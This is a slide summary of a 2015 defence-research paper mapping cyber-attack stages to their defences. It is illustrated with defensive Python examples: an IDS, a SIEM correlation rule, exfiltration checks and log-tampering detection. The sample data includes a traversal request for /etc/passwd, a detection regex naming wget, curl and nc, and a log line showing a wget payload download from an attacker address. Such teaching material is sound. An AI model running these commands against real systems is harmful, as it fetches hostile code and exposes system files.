Koustav Sadhukhan, Rao Arvind Mallari and Tarun Yadav DRDO, Ministry of Defense, INDIA Cyber Attack Thread: A Control-flow Based Approach to Deconstruct and Mitigate Cyber Threats 2015 International Conference on Computing and Network Communications (CoCoNet'15)

Motivation: the evolution of cyber threats

Cyber Kill Chain (Lockheed Martin)
- Reconnaissance
- Weaponization
- Delivery
- Exploitation
- Installation
- Command & Control
- Actions on Objectives

Cyber Attack Thread (the control-flow stages proposed in the paper)
- Attack Vector Verification & Reconnaissance
- Enticing the End-user
- Security Penetration
- Execution on Target System
- Internal Reconnaissance
- Information Exfiltration
- Covering Tracks

Attack Vector Verification and Reconnaissance
- Reconnaissance: passive reconnaissance (no traffic sent to the target) and active reconnaissance (probing the target directly)
- Attack vector verification: integration and testing of the attack components, based on the target-specific scenario and configuration

Enticing the End-user
- Targeting the user directly: e-mail, drive-by downloads, malicious USB media, etc. Defences: spam filters, web application firewall, etc.
- Targeting third-party interactions with the user: watering-hole attack (compromising a site the target population is known to visit)

Security Penetration to Reach the Target System
- Inbound network security
  - Intrusion detection and prevention systems: signature-based, anomaly-based, stateful protocol analysis. Examples: Snort, Suricata, Bro (since renamed Zeek)
  - Network-based firewall
- Inbound system security
  - Anti-virus
  - Host-based IDS
  - Host-based firewall
  - Application security
  - User awareness
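The difference between signature-based and anomaly-based detection is easiest to see on the same traffic. The following Python is an added example, not code from the paper or from Snort/Suricata/Bro: it runs a hypothetical content-match rule and a length-profile anomaly check over a constructed set of HTTP request lines, so that each detector catches a request the other misses.

```python
import re
import statistics

# Constructed sample of HTTP request lines (not from the paper). The first five
# are benign and double as the anomaly detector's baseline; the sixth carries a
# short, well-known traversal pattern; the seventh is a novel oversized input
# for which no signature exists.
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.1",
    "GET /images/logo.png HTTP/1.1",
    "GET /about HTTP/1.1",
    "POST /login HTTP/1.1",
    "GET /docs/faq HTTP/1.1",
    "GET /../etc/passwd HTTP/1.1",
    "GET /search?q=" + "A" * 600 + " HTTP/1.1",
]

# Hypothetical content-match rules in the spirit of a Snort/Suricata ruleset.
SIGNATURES = {
    "dir-traversal": re.compile(r"\.\./"),
    "cmd-injection": re.compile(r"[;|`]\s*(cat|wget|curl|nc)\b"),
}


def signature_detect(requests):
    """Signature-based: return (index, rule) for every request matching a known
    pattern. Catches only what a rule already describes; misses anything novel."""
    hits = []
    for i, req in enumerate(requests):
        for name, pattern in SIGNATURES.items():
            if pattern.search(req):
                hits.append((i, name))
    return hits


def anomaly_detect(requests, baseline, z_threshold=3.0):
    """Anomaly-based: return indices of requests whose length sits more than
    z_threshold standard deviations above the baseline profile. Needs no rule
    for the attack, but a short attack that looks normal in this one feature
    slips by."""
    lengths = [len(r) for r in baseline]
    mean = statistics.mean(lengths)
    stdev = statistics.pstdev(lengths) or 1.0  # flat baseline: avoid division by zero
    return [i for i, r in enumerate(requests) if (len(r) - mean) / stdev > z_threshold]


def detect(requests, baseline):
    """Run both detectors; together they cover what each misses alone."""
    return {
        "signature": signature_detect(requests),
        "anomaly": anomaly_detect(requests, baseline),
    }


if __name__ == "__main__":
    print(detect(SAMPLE_REQUESTS, SAMPLE_REQUESTS[:5]))
```

With the five benign lines as baseline, the traversal request (index 5) is flagged only by the signature rule, because at 27 bytes it is statistically unremarkable, while the 600-byte query (index 6) is flagged only by the anomaly check, because no rule describes it. A real IDS profiles many more features than request length, but the trade-off is the same.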

Execution on Target System
- The attacker's ability to execute crafted malicious content on the target system
- Exploit: the carrier for the payload. Takes advantage of flaws and vulnerabilities in software components such as office applications, PDF readers, web browsers, the OS and firmware
- Defences against exploits
  - Stack-based: stack cookies (stack-guard), Structured Exception Handler overwrite protection (SEHOP)
  - Heap-based: safe unlinking, allocation-order randomization, Virtual Table Guard (vtguard)
  - System-wide: Address Space Layout Randomization (ASLR), Data Execution Prevention (DEP), Control Flow Integrity (CFI)

Execution on Target System (contd.)
- Payload: the core component of the cyber attack, responsible for achieving its end objective
  - Kinds: remote access toolkit, rootkit, bootkit, dropper, downloader
  - Characteristics: stealthy, evasive, polymorphic, metamorphic
  - Objectives: data exfiltration (files, keylogs, user credentials), persistence, propagation
- Defences against the payload (types of malware detection): heuristic-based analysis and detection, behavioural analysis and detection, cloud-based detection, sandboxing

Internal Reconnaissance
- Information accessed by attackers: primary tactical information (what is needed to move further), secondary strategic information (what is ultimately wanted)
- Defences: Security Information and Event Management (SIEM), data labelling, minimizing the storage of credentials, two-factor authentication, restricting access to system logs
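A SIEM earns its place at this stage through correlation rules that no single host can evaluate. The Python below is an added example, not the paper's code or any SIEM product's rule language: it runs one such rule, "one account reaching an unusual number of distinct hosts in a short window", over constructed logon events (field names and hostnames are invented for the example). Failed logons are counted as well as successes, since an attacker enumerating shares or services trips both.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed logon events (not from the paper): alice behaves normally,
# bob's account touches six different systems inside three minutes.
EVENTS = [
    "2015-12-16T09:00:05 user=alice src=10.0.1.15 dst=fileserv01 result=success",
    "2015-12-16T09:20:41 user=alice src=10.0.1.15 dst=mail01 result=success",
    "2015-12-16T09:58:12 user=alice src=10.0.1.15 dst=fileserv01 result=success",
    "2015-12-16T10:00:00 user=bob src=10.0.1.77 dst=fileserv01 result=success",
    "2015-12-16T10:00:31 user=bob src=10.0.1.77 dst=fileserv02 result=failure",
    "2015-12-16T10:01:02 user=bob src=10.0.1.77 dst=db01 result=success",
    "2015-12-16T10:01:40 user=bob src=10.0.1.77 dst=hr-share result=success",
    "2015-12-16T10:02:15 user=bob src=10.0.1.77 dst=dc01 result=failure",
    "2015-12-16T10:02:58 user=bob src=10.0.1.77 dst=backup01 result=success",
]

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<rest>.*)$")


def parse(line):
    """Turn one 'timestamp key=value ...' line into a dict with a datetime 'ts'."""
    m = LINE_RE.match(line)
    fields = dict(kv.split("=", 1) for kv in m.group("rest").split())
    fields["ts"] = datetime.fromisoformat(m.group("ts"))
    return fields


def find_fanout(lines, window=timedelta(minutes=10), min_hosts=5):
    """Correlation rule: alert when one user reaches >= min_hosts distinct
    destinations within any sliding window. Returns (user, window_start, hosts)."""
    by_user = defaultdict(list)
    for ev in map(parse, lines):
        by_user[ev["user"]].append(ev)

    alerts = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["ts"])
        for i, start in enumerate(evs):
            hosts = {e["dst"] for e in evs[i:] if e["ts"] - start["ts"] <= window}
            if len(hosts) >= min_hosts:
                alerts.append((user, start["ts"].isoformat(), sorted(hosts)))
                break  # one alert per user is enough; a real SIEM would suppress repeats
    return alerts


if __name__ == "__main__":
    for alert in find_fanout(EVENTS):
        print("ALERT lateral fan-out:", alert)
```

The window and host-count thresholds are the tunable part; they should be set from a baseline of each account's normal behaviour, which is exactly the kind of data a SIEM has and a single host does not.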

Information Exfiltration
- Channels available to the attacker: TCP, FTP, HTTP POST/GET; others such as e-mail, SSH, instant messaging, social media, Dropbox, etc.; covert channels
- Defence mechanisms: blacklists, statistical profiles, packet header mangling, deploying a DMZ, limiting protocol support, packet regeneration
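Two of the defences listed above, blacklists and statistical profiles, are complementary: the blacklist catches a small upload to a known-bad host, the profile catches a large upload to a host nobody has seen before. The Python below is an added example, not the paper's code: it checks constructed outbound flow records against a hypothetical blacklist and a per-host baseline of daily bytes out (all addresses are documentation ranges and all numbers are invented).

```python
import statistics
from collections import defaultdict

# Constructed known-bad drop host (TEST-NET-2 address, hypothetical).
BLACKLIST = {"198.51.100.23"}

# Constructed per-host profile: bytes sent per day over the previous five days.
BASELINE_BYTES_OUT = {
    "10.0.1.15": [120_000, 95_000, 130_000, 110_000, 105_000],
    "10.0.1.77": [40_000, 52_000, 38_000, 45_000, 50_000],
}

# Constructed flows for today: (src, dst, dst_port, bytes_out).
FLOWS = [
    ("10.0.1.15", "203.0.113.10", 443, 60_000),
    ("10.0.1.15", "203.0.113.10", 443, 55_000),
    ("10.0.1.77", "203.0.113.44", 80, 20_000),
    ("10.0.1.77", "203.0.113.44", 80, 2_400_000),  # large HTTP POST to an unfamiliar host
    ("10.0.1.77", "198.51.100.23", 21, 5_000),     # small FTP upload to a blacklisted host
]


def check_flows(flows, baseline, blacklist, z=3.0):
    """Return alerts of three kinds:
    ('blacklist', src, dst, port, bytes)      destination is known bad, any size
    ('volume', src, total, mean, stdev)       today's bytes out exceed mean + z*stdev
    ('no-profile', src, total)                host has no baseline, cannot be judged
    """
    alerts = []
    totals = defaultdict(int)
    for src, dst, dport, nbytes in flows:
        if dst in blacklist:
            alerts.append(("blacklist", src, dst, dport, nbytes))
        totals[src] += nbytes

    for src, total in totals.items():
        history = baseline.get(src)
        if not history:
            alerts.append(("no-profile", src, total))
            continue
        mean = statistics.mean(history)
        stdev = statistics.pstdev(history) or 1.0  # flat history: avoid a zero threshold
        if total > mean + z * stdev:
            alerts.append(("volume", src, total, mean, stdev))
    return alerts


if __name__ == "__main__":
    for alert in check_flows(FLOWS, BASELINE_BYTES_OUT, BLACKLIST):
        print(alert)
```

Here 10.0.1.15 sends 115 kB against a mean of 112 kB and stays quiet, while 10.0.1.77 sends about 2.4 MB against a 45 kB mean and is flagged, and its 5 kB FTP session is flagged regardless of size because of the destination. Neither check sees inside an encrypted channel, which is why the slide also lists limiting protocol support and packet regeneration at the perimeter.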

Covering Tracks
- Attacker's actions: data elimination (deleting log entries), data manipulation (altering log entries), direct attacks on the defender's tools and techniques
- Defender's countermeasures: remote logging facilities, log correlation, distributed forensics and incident response
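Remote logging only pays off if someone correlates the remote copy against what is left on the host. The Python below is an added example, not the paper's code: it aligns a constructed local syslog fragment with the copy held by a hypothetical remote log server and classifies each divergence as elimination or manipulation, which is the evidence that triggers a forensic response.

```python
import difflib

# Constructed syslog lines as received by the remote log server (hypothetical
# hostnames and addresses). This copy is treated as authoritative because the
# attacker has no write access to the log server.
REMOTE_LOG = [
    "Dec 16 10:00:01 web01 sshd[2001]: Accepted password for alice from 10.0.1.15 port 50122 ssh2",
    "Dec 16 10:00:40 web01 sshd[2042]: Accepted password for root from 203.0.113.9 port 41000 ssh2",
    "Dec 16 10:01:10 web01 sudo: root : COMMAND=/usr/bin/wget http://203.0.113.9/p.sh",
    "Dec 16 10:03:22 web01 sshd[2042]: Received disconnect from 203.0.113.9",
    "Dec 16 10:05:00 web01 cron[2100]: (root) CMD (run-parts /etc/cron.hourly)",
]

# Constructed local copy after the attacker cleaned up: the root logon now
# appears to come from an internal address, and the wget and disconnect
# lines are gone.
LOCAL_LOG = [
    REMOTE_LOG[0],
    "Dec 16 10:00:40 web01 sshd[2042]: Accepted password for root from 10.0.1.15 port 41000 ssh2",
    REMOTE_LOG[4],
]


def correlate(local, remote):
    """Align the local log against the remote copy and report divergences as
    ('eliminated', remote_line), ('manipulated', remote_line, local_line) or
    ('local-only', local_line). Within a replaced run the pairing of remote
    and local lines is positional, which is a heuristic, not proof of which
    line was edited into which."""
    findings = []
    matcher = difflib.SequenceMatcher(a=remote, b=local, autojunk=False)
    for tag, i1, i2, j1, j2 in matcher.get_opcodes():
        if tag == "delete":
            findings.extend(("eliminated", line) for line in remote[i1:i2])
        elif tag == "insert":
            findings.extend(("local-only", line) for line in local[j1:j2])
        elif tag == "replace":
            r_seg, l_seg = remote[i1:i2], local[j1:j2]
            findings.extend(("manipulated", r, l) for r, l in zip(r_seg, l_seg))
            findings.extend(("eliminated", line) for line in r_seg[len(l_seg):])
            findings.extend(("local-only", line) for line in l_seg[len(r_seg):])
    return findings


if __name__ == "__main__":
    for finding in correlate(LOCAL_LOG, REMOTE_LOG):
        print(finding)
```

On this input the check reports one manipulated entry (the root logon's source address) and two eliminated entries (the wget and the disconnect). A local-only entry is suspicious too: it means the host wrote something the remote server never received, for instance after the attacker stopped the forwarder.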

Conclusion
- The attacker's actions at each stage were observed
- Corresponding to each stage, the existing defence mechanisms were listed
- This will help administrators and security professionals harden and secure their infrastructure against such complex attacks

Thank you. Doubts or questions? Contact: